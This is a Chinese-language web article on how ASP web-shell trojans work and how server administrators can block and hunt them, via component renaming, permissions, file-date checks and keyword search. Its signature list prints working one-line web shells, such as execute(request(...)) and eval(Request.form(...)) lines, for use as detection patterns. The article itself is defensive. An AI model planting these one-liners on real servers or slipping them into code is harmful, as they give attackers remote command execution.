ASP木马的原理和基本防范方法

  次阅读 作者:智能小宝 来源:互联网 2016-03-01 13:09 我要评论(0)

ASP木马猖獗,基于ASP的网站时时处于危险之中,要让网站的安全随时得到保障,需要我们的服务器管理员要做些什么呢,如何防范ASP木马呢?要防范ASP木马,那么我们就需要知道它的运行原理和机制,下面我们看一段代码

Set oscript = Server.CreateObject("Wscript.SHELL") "建立了一个名为oscript的Wscript.SHELL对象,用于命令的执行"

Set oscriptNet = Server.CreateObject("Wscript.NETWORK")

Set oFileSys = Server.CreateObject("scripting.FileSystemObject")

上面三行代码创建了Wscript.SHELL、Wscript.NETWORK、scripting.FileSystemObject三个对象我们可以看出asp木马的运行原理就是通过调用组件对象等完成的。

通过分析一些asp木马,我们看出主要是通过3个组件运行的,第一个是我们都知道的FSO, 需要FSO支持也就是"scripting.FileSystemObject"项的支持,那么有人会说,是不是删除这个组件就可以了呀 ,不可以的,因为现在很多程序都是要用到FSO这个组件的,所以是觉得不能限制的,不然正常的程序也运行不了,现在网上有很多教程,告诉别人删除或限制使用,这些方法都很极端,我不推荐大家使用,我们再说另外几个组件"shell.application"、"Wscript.SHELL"等危险组件 ,一般的木马都是要使用这几个组件的 ,即使你把fso组件限制的话,你不去限制别的组件的的话,一样不能起到效果的,对于fso组件之外的其他的几个组件,我们平时是不太用的,所以我们可以直接在注册表中的HKEY_CLASSES_ROOT中找到

找到"shell.application"、"Wscript.SHELL"等危险的脚本对象(因为它们都是用于创建脚本命令通道的)进行改名或删除,也就是限制系统对“脚本SHELL”的创建,ASP木马也就成为无本之木、无米之炊,运行不起来了。如果我们自己要使用的话,那么我们就不要删除直接改下名字,如果是改名,要改得复杂一点,不要让别人猜到了,我们在要用的程序里面直接把调用的名字改成我们刚才修改的名字就可以了。

对组件进行限制之后,我们还应该对服务器的权限进行严格的设置,这里我就不说了,由于篇幅问题,等下不知道要写多久了,大家可以参考网上的一些安全权限设置, 我们对权限和组件等等设置完了之后,基本上就能防止asp木马的危害了。

另外有一点应该注意,如果确实发现木马了,查杀完之后,应该将具有管理权限的各类帐号都进行修改。包括论坛的帐号、数据库帐号以及服务器操作系统帐号、FTP 帐号等,如果我们做到了这个几点话,我们的服务器基本上是安全了,呵呵,为什么说是基本的呢,因为这个世界上根本就没有安全的服务器了,只不过我们刚才说到的设置只是能够防范大部分asp木马的的侵害,不排除一些别的因素,比如说提限。说白了防范asp木马就是要限制组件,设置严格的权限和保证asp程序的安全

我们下面说下怎么样查杀asp木马了,我根据自己的一些经验说几种方法

1. 时间比较法

按时间顺序找到最近被改动的asp文件 ,打开看下,是不是木马呢,什么,看不懂代码, 那你就把不是你自己放的asp文件,名字看一眼就看的出的。比如说diy.ap.dm6.asp,angel.asp.shell.asp什么的文件,可疑的asp文件不是你自己创建的删除,或直接访问下看下是不是木马就可以了

2. 查找关键字,asp木马都是有关键字的,也就像病毒的特征码,我们用windows自带的搜索功能就能查找到 ,查找包含内容为关键字的所有文件就可以了,找到以后看下就可以了,有时候能查找到一些asp的大文件,如果是虚拟主机的话,一般是数据库文件改成asp的了,如果是一句话木马的关键字就小心了,如果是大型木马的关键字,咱们访问一下看看,我不赞成把数据库改成asp的,至于为什么,大家都知道吧。

我整理了一些特征码,现在给大家

gxgl

lcx

<script RUNAT=SERVER LANGUAGE=JAVAscript>eval(Request.form(’#’)+’’)</script>

输入马的内容

session("b")

request("kker")

非常遗憾,您的主机不支持ADODB.Stream,不能使用本程序

传至服务器已有虚拟目录

警告:对非法使用此程序可能带来的任何不良后果责任自负!请勿用于非法用途!!!

<%execute request("value")%>

ccopus

<%execute(request("#"))%>

<script language="vbscript" runat=server>if reques(#")<>"" then execute(request("#"))</script>

本站文章信息来源于网络以及网友投稿,本站只负责对文章进行整理、排版、编辑,是出于传递更多信息之目的,并不意味着赞同其观点或证实其内容的真实性。如果您有什么意见或建议,请联系QQ28-1688-302!

人工智能实验室
相关文章相关文章
  • 未来两年人工智能要怎么走?看这篇就够了

    未来两年人工智能要怎么走?看这篇就够了

  • 无人驾驶汽车如何改变城市生活?听听他们怎么说

    无人驾驶汽车如何改变城市生活?听听他们怎么说

  • 韩春雨称已能重复实验结果 近期将有消息公布

    韩春雨称已能重复实验结果 近期将有消息公布

  • 英国研发“杀生”机器人 通过生命体获取能量

    英国研发“杀生”机器人 通过生命体获取能量

网友点评网友点评
阅读推荐阅读推荐

据国外媒体报道,在过去两年内,聊天机器人(chatbot)、人工智能以及机器学习的研发和采用取得了巨大进展。许多初创公司正利用人工智能和...

霍金 视觉中国 图 英国著名物理学家霍金(Stephen Hawking)再次就人工智能(AI)发声,他认为:对于人类来说,强大AI的出现可能是最美妙的...

文|郑娟娟 今年,人工智能(AI) 60岁了。在AI60岁的时候,笔者想要介绍一下AI100,一个刚刚2岁的研究项目,但它的预设寿命是100年,甚至更长...

AlphaGo与李世石的人机大战,为大众迅速普及了人工智能的概念。 但对谷歌而言,除了下围棋,现在的人工智能进展到哪一步了?未来,人工智能...